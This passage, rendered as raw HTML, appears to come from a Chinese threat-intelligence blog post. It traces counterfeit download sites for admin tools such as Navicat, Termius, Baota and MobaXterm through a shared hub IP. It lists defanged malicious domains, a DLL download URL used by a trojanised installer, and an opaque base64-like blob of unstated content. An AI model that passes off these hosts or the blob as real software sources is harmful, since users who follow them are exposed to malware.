leaf="">bSmyMBysGTzluqVFcnrDR5qzyxDjXGSpJ/RvRNfeKZptNLr7RAd1ZerHDKZTkm7sz+y90o6+prHaaUakk4Vcxdog7ooKqByi9fcrmcz/5reUb44/3BasR1JGoJ8rgAxid5xreX98w7NHfCuj7vHX44PxvkeieosH2uLtUZsH7zTH3j/doeV6BETNJXyiSj4pmtgIWoj//Bc4Sx2qBMGMRRFEBvrR0/c6++eJOTehWLUSH9qoNem+Pu/Ns3flC6sGbi9sb52GhkyPhM638zjqqby/8BJfUGPm7H3SCkCfwYsPX/3aXhXNNDrxNggphStSH0/FjtrC5hfEUCTPo1hwvkL4echuGI/TpOu5edGSuknrig0Vo5JpzDGcjN8lzyHj/OROoL2S85SQCsRvY6maoRGUZ4aHmNfZlRpVVvSuTPHHuvWh94rhjiaxr9sXts+nGfmD/mPH7QtAbm7QRc76hPFLCzj+AdCxB66uiFyPAPsudLdlMB3wghC4IgcNgATXbD1W65eHkEyAgYfhFFofOW4D3TaYflgBZpXacRmsjedHYmyoPcpjiBYt/wOqu0XEoH+5thRJ9GBOk2ftU0iK/fonYHhKvrt/oamMq/+ExJQ/tMYnW1XbzZI6++DM0Szy5dk/+q+V8hgvfdlyy+ywEZMb65pESRdDioX3JcEC74uQADm8s9MoRHVqmHiKE495lb6MtgE4yvbIw0ue/b5zmZXTFDECKvhSOiPA0/EDD+MAqGMjUgzqzANYJQOdOD4M6sV27uqmVU+RmxlIBQE1AIXI64uGm8XS4V1xXqNkcfhd6AY0B/teBeMFEqBm3PDF5o/9ygvyEQCO42smy7ragfSxOjkiD3Mi/VA5KMncgJR9Jq8eztiKg8II9D/rIhUGgxxlghyovGTj+WMXFrW8PoAwdzmzEKZxmczbWpLhbKjoaPoXofe2x9nm70Gsxotzh1aDOwMp3DCRVgZplJl/yX1KFd7/snvynNbnYj3CmplYbP4aljPW6+Jsm0IRBhqel+AHQ2IwlL0lK3Td0p3Jd/msqzL4gotJcvfn7KMsgVQZ2MWbwp2RYQ+Y8KR8nDTWB/g7yOnMz1CThs9tvAnkEfmo5CVEEwjb81BR2382sHt4IarhxA7lGAtbuXNbAe8Y4ZH4QJUi8zv2jtx9LOCsxklP05xgdGaa+iQt2L+cKu3kzPfyNpWyVgRr9Jo5Wu9LQNnCvQNyLdUJkZDZK3ibdkVH4PAyDFjB9aDJchiO2oHltGeuwmrs1kjb3GUyNGOfDWvDHEm9ClYfv7K3n9X0OFXlS8NNmtD3LpUqClwPmngBOhLOdyEzsg+4/T3jwgeA38lw1JW4e5Wpxg8CT7nqI2PsDAS6tsj10EexX7VTdEZ6l7O2G5KsA2avpaiojCUPIyBv/tiHukLLj4wGZIlol96sDNa3izsQCLfTnbl4O4QvOV4sForQ7KzFPSlzTTYC7xAtZ0FOdnjmNUZWBF5gNV0Dnly0QYMVQsl1CfNL4/AumLdlVhlEyPuy+7yEybvoffGks7LB+X10gWoyYvzXgTwNm+WrPrUhRKH8gEB3cRmeUfSeXPiLZNud0M/CuhShO8Y+auTzu8f1fNM9H4j6gKunwck+HudZQcIM8sbK8Ozafltja/W7pLfKd5YNcmJIq/xKQzad8ielbNPW3zYbmckFy+UARp0vtoCqqSvIHo498GJNBoqBucN2nQSxrNqHClA7JEUJp5WGMaaLuNjnNYoyE/Ddho+p3SByj88yLgkD9Xgdp0dV6rBnYI9sqTFE6rDZcRaJ0RQtVrcJvSO8tgdSUx8VM6ax4lC++Bu7T5TYiOQsn2rYSBzIdsgR3Uha</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还有假冒的 navicat </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://na.nyazz[.]com/" target="_blank">http://na.nyazz[.]com/</a></span></code><span leaf=""> 和假冒的 RDM </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://redi.nyazz[.]com/" target="_blank">https://redi.nyazz[.]com/</a></span></code><span leaf="">  （最开始看到这里的时候貌似还没有这俩来着，写文章重新捋的时候补充上的）。</span></p><p><img data-imgfileid="100001498" class="rich_pages wxw-img" data-ratio="0.37031994554118447" data-s="300,640" data-type="png" data-w="2938" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8d44756b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9NCZuBI4K2m5u9IROiazfRzVumKaC8pjGgPYUzc8FbNcN5IibZVjVkM1Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">重头戏 - 枢纽IP - 216.83.52.155</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">一方面刚刚过去的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">scrt1.nyazz[.]com</span></code><span leaf=""> 曾经解析过  216.83.52.155，另外一方面在 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf=""> 下载的 Xshell7.rar 当中的 MobaXterm_Personal_24.2.exe 还请求下载了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://ssh.0523qyfw[.]com/MobServe.dll" target="_blank">https://ssh.0523qyfw[.]com/MobServe.dll</a></span></code><span leaf=""> 。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">ssh.0523qyfw[.]com</span></code><span leaf=""> 在之前还有解析记录的时候就是解析到 216.83.52.155。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在奇安信 ti 根据 216.83.52.155 反查解析记录，只能看到三个比较近的历史解析。</span></p><p><img data-imgfileid="100001499" class="rich_pages wxw-img" data-ratio="0.3013168086754454" data-s="300,640" data-type="png" data-w="2582" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=42624c07&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9lcwOgibGQpNem4ibVTsHUw110taWa0rLUpkgicgrCuINbEGc7LyODsPDw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">78341[.]cc</span></code><span leaf=""> 是一个假冒的 Termius 官网，现在解析到 IP 地址 154.19.200.137（后面再说它）。</span></p><p><img data-imgfileid="100001501" class="rich_pages wxw-img" data-ratio="0.6850828729281768" data-s="300,640" data-type="png" data-w="2534" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f3a88f74&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9tuuUJiaGUepDbFz0OQX67iaCnO2Uibw0bUzXwD2tar3POFNw54ZtbAPDw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而这个在 23年11月到24年4月解析到过 216.83.52.155 的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">baota.yingxunszcm[.]cn</span></code><span leaf=""> ，</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">是一名老兵了</span></strong><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在搜索引擎上搜索域名可以找到该域名关联假冒宝塔的记录以及有人中招的痕迹。</span></p><p><img data-imgfileid="100001500" class="rich_pages wxw-img" data-ratio="0.4813126709206928" data-s="300,640" data-type="png" data-w="2194" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0aa4ab8d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY96bYNKdUUCNee9icrevOzrsK2zRGEW2T1VGF4yria2GR3cJ0XC5iaW1Fqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001502" class="rich_pages wxw-img" data-ratio="0.5710431654676259" data-s="300,640" data-type="png" data-w="2224" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=872bbe47&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9leia3rS9AbRkk20zeNh17VfQuh5sBMKWP9uBsfg0rbLwzsVGKYWet1A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">download.cnnbt[.]net</span></code><span leaf=""> 也能发现一些中招记录，当然不排除是作者的推广文章</span></p><p><img data-imgfileid="100001503" class="rich_pages wxw-img" data-ratio="0.5165919282511211" data-s="300,640" data-type="png" data-w="2230" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e95dcab5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9R2rLGMEKRu1fn227elTIwRFNnyLJ75qIymPg6aaZgnMIo90vdgWxwQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001504" class="rich_pages wxw-img" data-ratio="0.6319634703196347" data-s="300,640" data-type="png" data-w="2190" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=48a88f6e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9D77Cq48LPMoKqGgrYIia1FFxnMWK9P22UOAvxORtyD7UDJicgSicwVoNA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索了一下 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">download.cnnbt[.]net</span></code><span leaf=""> 已经打不开了，但是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">bt01.cnnbt[.]net / bt03.cnnbt[.]net</span></code><span leaf=""> 目前解析量仍然不小。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">域名       IP地址       IP归属地</span><span leaf=""><br/></span><span leaf="">bt03.cnnbt.net  8.134.70.11     中国/广东省/广州市</span><span leaf=""><br/></span><span leaf="">bt01.cnnbt.net  8.134.141.109    中国/广东省/广州市</span><span leaf=""><br/></span><span leaf="">bt02.cnnbt.net  8.134.153.118    中国/广东省/广州市</span><span leaf=""><br/></span><span leaf="">download.cnnbt.net  8.210.249.179  中国/中国香港</span><span leaf=""><br/></span><span leaf="">bt05.cnnbt.net  47.243.240.61    中国/中国香港</span><span leaf=""><br/></span><span leaf="">www.cnnbt.net  - -</span><span leaf=""><br/></span><span leaf="">bt04.cnnbt.net  47.243.240.61    中国/中国香港</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">虽然奇安信 ti 能够反查到的可疑历史域名解析只有三个，但是主机信息这里（鹰图 Hunter 的数据）却能看到一堆疑似假冒 AMH、MobaXterm 、Plesk 、SecureCRT、宝塔 的网页标题和域名。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中还关联到 macyy 的一个子域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7a1.macyy[.]cn</span></code><span leaf="">。</span></p><p><img data-imgfileid="100001505" class="rich_pages wxw-img" data-ratio="0.5993589743589743" data-s="300,640" data-type="png" data-w="2496" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=91150eef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PJqb5yp9S1vYT30YxfdGzpf2Ud5LgwVu4BhU1KibBuGXMI12Wq2UsMw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">此时用 VT 反查 216.83.52.155，可以关联出大量的历史解析域名，光看域名都能大体知道咋回事，刚才的站点标题数据就说的过去了。</span></p><p><img data-imgfileid="100001507" class="rich_pages wxw-img" data-ratio="0.6048565121412803" data-s="300,640" data-type="png" data-w="2718" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=900258a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY93FiaUvTVee6Lk723eF9MiaxIlIobMGQR1kypnicRluF0XK98MeKNcInBg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 